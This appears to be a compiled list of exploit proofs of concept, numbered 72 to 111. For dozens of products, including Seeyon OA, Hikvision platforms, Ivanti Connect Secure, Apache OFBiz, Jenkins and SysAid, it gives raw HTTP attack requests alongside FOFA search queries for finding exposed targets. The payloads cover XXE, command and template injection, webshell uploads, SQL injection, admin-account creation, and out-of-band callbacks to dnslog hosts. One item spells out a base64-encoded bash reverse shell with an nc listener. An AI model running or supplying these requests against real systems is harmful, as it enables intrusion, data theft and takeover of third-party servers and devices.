Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达 天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Echo URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
<params>
  <param>
    <value>
      <struct>
        <member>
          <name>test</name>
          <value>
            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
          </value>
        </member>
      </struct>
    </value>
  </param>
</params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file content; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
